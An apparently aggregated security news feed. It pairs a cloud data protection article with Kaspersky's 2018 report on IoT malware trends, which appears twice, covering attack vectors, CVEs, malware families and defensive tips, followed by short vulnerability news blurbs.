Data that’s stored in the cloud is inherently accessible to other people, including cloud service providers, via numerous endpoints, such as mobile devices and social media applications. You can no longer protect your sensitive data by simply locking down network access.

You need security against outside threats, but you also need it on the inside, all the way down to where the data resides. To address this, look for a provider that offers strong data encryption and data activity monitoring, inside and out.

Data Is Here, There and Everywhere

With the growth of mobile and cloud storage, data is here, there, in the cloud, on premises, and everywhere in between. Some of it is even likely stored in locations you don’t know about. Not only does everyone want access to data, they expect access to it at the click of a mouse. A complete cloud data protection solution should have the following:

  • Mature, proven analytical tools that can analyze your environment to automatically discover data sources, analyze those data sources to discover the critical, sensitive, regulated data, and intelligently and automatically uncover risks and suspicious behavior.
  • Protection with monitoring across all activity, both network and local, especially the actions of privileged users with access to your most sensitive data. Of course, you should also protect data with strong encryption.
  • Adaptability to your changing and expanding environment, with a security solution that can support hybrid environments and seamlessly adjust to alterations in your IT landscape.

How to Gain Visibility Into Risks and Vulnerabilities

Detecting risks of both internal and external attacks is more challenging as data repositories become more virtualized. Common vulnerabilities include missing patches, misconfigurations and exploitable default system settings.

Best practices suggest authorizing both privileged and ordinary end users according to the principle of least privilege to minimize abuse and errors. A robust cloud data protection solution can help secure your cloud and hybrid cloud infrastructure with monitoring and assessment tools that reveal anomalies and vulnerabilities.

Choose the Right Data-Centric Methodology

A data-centric methodology should go hand in hand with the solutions outlined above to support cloud data protection. Make sure your data security solution can do the following:

  • Automatically and continuously discover data sources that you may not have realized existed. This means classifying the data in those databases to understand where you have sensitive, regulated and high-risk data.
  • Harden data sources and data. For data sources, that means understanding what vulnerabilities exist and who has access to data based on entitlement reports. For hardening data, your solution should enable you to set policies around who has access and when access needs to be blocked, quarantined or possibly allowed but masked before granting access.
  • Monitor all users, especially privileged users, to be able to prove to auditors that they are not jeopardizing the integrity of your data.
  • Proactively protect with blocking, quarantining and masking, as well as threat analytics that cover all data sources and use machine learning. Threat analytics can help you understand which activities represent normal, everyday business and which are suspect or anomalous — information that humans can’t possibly uncover on a large scale.

Find a Guard Dog for Your Cloud Data Protection

If your organization is just starting out with data protection, consider a software-as-a-service (SaaS) risk analysis solution that can enable you to quickly get started on the first two steps outlined above. By starting with a solution that supports discovery, classification and vulnerability assessments of both on-premises and cloud-based data sources, you can make demonstrable progress with minimal time and technology investment. Once you have that baseline, you can then start investigating more comprehensive data activity monitoring, protection and encryption technologies for your cloud-bound data.

The post When It Comes to Cloud Data Protection, Defend Your Information Like a Guard Dog appeared first on Security Intelligence.

Kaspersky: Attacks on Smart Devices Rise Threefold in 2018

Attacks against smart devices are surging, with both old and new threats targeting connected devices that remain largely unsecured, according to researchers at Kaspersky Lab. Kaspersky researchers observed three times as many malware samples against smart devices in the first half of 2018 than they did in all of 2017, according to new findings...

Read the whole entry... »

Related Stories

Peekaboo Zero-Day Vulnerability Allows Hacking of Surveillance Cameras

iOT based security cameras from various vendors invites opportunities for flaws. Recently, researchers have discovered a similar vulnerability that allows hacking

Peekaboo Zero-Day Vulnerability Allows Hacking of Surveillance Cameras on Latest Hacking News.

Facebook Bug Bounty Program Expands To Include Third-Party Apps

In the post-Cambridge Analytica phase, Facebook appears to have worked extensively towards user data privacy. Although, even after the Cambridge Analytica

Facebook Bug Bounty Program Expands To Include Third-Party Apps on Latest Hacking News.

Securelist – Kaspersky Lab’s cyberthreat research and reports: New trends in the world of IoT threats

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

&&

Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018. (download)

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

service % of attacks
Telnet 75.40%
SSH 11.59%
other 13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

# downloaded malware % of attacks
1 Backdoor.Linux.Mirai.c 15.97%
2 Trojan-Downloader.Linux.Hajime.a 5.89%
3 Trojan-Downloader.Linux.NyaDrop.b 3.34%
4 Backdoor.Linux.Mirai.b 2.72%
5 Backdoor.Linux.Mirai.ba 1.94%
6 Trojan-Downloader.Shell.Agent.p 0.38%
7 Trojan-Downloader.Shell.Agent.as 0.27%
8 Backdoor.Linux.Mirai.n 0.27%
9 Backdoor.Linux.Gafgyt.ba 0.24%
10 Backdoor.Linux.Gafgyt.af 0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

&&

Geographical distribution of the number of infected devices, Q2 2018. (download)

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service Port % of attacks Attack vector Malware families
Telnet 23, 2323 82.26% Bruteforce Mirai, Gafgyt
SSH 22 11.51% Bruteforce Mirai, Gafgyt
Samba 445 2.78% EternalBlue, EternalRed, CVE-2018-7445
tr-069 7547 0.77% RCE in TR-069 implementation Mirai, Hajime
HTTP 80 0.76% Attempts to exploit vulnerabilities in a web server or crack an admin console password
winbox (RouterOS) 8291 0.71% Used for RouterOS (MikroTik) authentication and WinBox-based attacks Hajime
Mikrotik http 8080 0.23% RCE in MikroTik RouterOS < 6.38.5 Chimay-Red Hajime
MSSQL 1433 0.21% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft
GoAhead httpd 81 0.16% RCE in GoAhead IP cameras Persirai, Gafgyt
Mikrotik http 8081 0.15% Chimay-Red Hajime
Etherium JSON-RPC 8545 0.15% Authorization bypass (CVE-2017-12113)
RDP 3389 0.12% Bruteforce
XionMai uc-httpd 8000 0.09% Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices) Satori
MySQL 3306 0.08% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device % of infected devices
MikroTik 37.23%
TP-Link 9.07%
SonicWall 3.74%
AV tech 3.17%
Vigor 3.15%
Ubiquiti 2.80%
D-Link 2.49%
Cisco 1.40%
AirTies 1.25%
Cyberoam 1.13%
HikVision 1.11%
ZTE 0.88%
Miele 0.68%
Unknown DVR 31.91%

As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users

DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE 2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Etherium miner remote management tool, they substitute the wallet address for their own.

Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses TOR for communication with C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

Conclusion

Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.


Securelist - Kaspersky Lab’s cyberthreat research and reports

New trends in the world of IoT threats

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018. (download)

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

service % of attacks
Telnet 75.40%
SSH 11.59%
other 13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

# downloaded malware % of attacks
1 Backdoor.Linux.Mirai.c 15.97%
2 Trojan-Downloader.Linux.Hajime.a 5.89%
3 Trojan-Downloader.Linux.NyaDrop.b 3.34%
4 Backdoor.Linux.Mirai.b 2.72%
5 Backdoor.Linux.Mirai.ba 1.94%
6 Trojan-Downloader.Shell.Agent.p 0.38%
7 Trojan-Downloader.Shell.Agent.as 0.27%
8 Backdoor.Linux.Mirai.n 0.27%
9 Backdoor.Linux.Gafgyt.ba 0.24%
10 Backdoor.Linux.Gafgyt.af 0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

Geographical distribution of the number of infected devices, Q2 2018. (download)

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service Port % of attacks Attack vector Malware families
Telnet 23, 2323 82.26% Bruteforce Mirai, Gafgyt
SSH 22 11.51% Bruteforce Mirai, Gafgyt
Samba 445 2.78% EternalBlue, EternalRed, CVE-2018-7445
tr-069 7547 0.77% RCE in TR-069 implementation Mirai, Hajime
HTTP 80 0.76% Attempts to exploit vulnerabilities in a web server or crack an admin console password
winbox (RouterOS) 8291 0.71% Used for RouterOS (MikroTik) authentication and WinBox-based attacks Hajime
Mikrotik http 8080 0.23% RCE in MikroTik RouterOS < 6.38.5 Chimay-Red Hajime
MSSQL 1433 0.21% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft
GoAhead httpd 81 0.16% RCE in GoAhead IP cameras Persirai, Gafgyt
Mikrotik http 8081 0.15% Chimay-Red Hajime
Etherium JSON-RPC 8545 0.15% Authorization bypass (CVE-2017-12113)
RDP 3389 0.12% Bruteforce
XionMai uc-httpd 8000 0.09% Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices) Satori
MySQL 3306 0.08% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device % of infected devices
MikroTik 37.23%
TP-Link 9.07%
SonicWall 3.74%
AV tech 3.17%
Vigor 3.15%
Ubiquiti 2.80%
D-Link 2.49%
Cisco 1.40%
AirTies 1.25%
Cyberoam 1.13%
HikVision 1.11%
ZTE 0.88%
Miele 0.68%
Unknown DVR 31.91%

As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users

DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE 2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Etherium miner remote management tool, they substitute the wallet address for their own.

Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses TOR for communication with C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

Conclusion

Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.

SecurityWeek RSS Feed: Code Execution in Alpine Linux Impacts Containers

A security researcher discovered several vulnerabilities in Alpine Linux, a distribution commonly used with Docker, including one that could allow for arbitrary code execution. 

Based on musl and BusyBox, the Alpine Linux distribution has a small size and is heavily used in containers, including Docker, as it provides fast boot times. 

read more



SecurityWeek RSS Feed

Podcast Episode 112: what it takes to be a top bug hunter

In this week’s episode (#112): top bug hunters can earn more than $1 million a year from “bounties” paid for information on exploitable software holes in common platforms and applications. What does it take to be among the best? We talk with Jason Haddix of the firm Bug Crowd to find out. Also: The Internet Society’s Jeff...

Read the whole entry... »

Related Stories

A CSS-Based Web Attack Can Restart Your iPhone Or Freeze Your Mac

A researcher discovered a new CSS-based web attack that can make your iPhone restart or respring. Moreover, Mac users may

A CSS-Based Web Attack Can Restart Your iPhone Or Freeze Your Mac on Latest Hacking News.

Microsoft Patched FragmentSmack Vulnerability Targeting Windows

This Tuesday, Microsoft September Patch was rolled out containing fixes for a number of security vulnerabilities. While it gained attention

Microsoft Patched FragmentSmack Vulnerability Targeting Windows on Latest Hacking News.

SecurityWeek RSS Feed: Google’s Android Team Finds Serious Flaw in Honeywell Devices

Members of Google’s Android team discovered that some of Honeywell’s Android-based handheld computers are affected by a high severity privilege escalation vulnerability. The vendor has released software updates that should address the flaw.

read more



SecurityWeek RSS Feed

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys

Despite continuous patches, Intel CPUs keep making the news for one or another vulnerabilities being spotted by researchers. While numerous

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys on Latest Hacking News.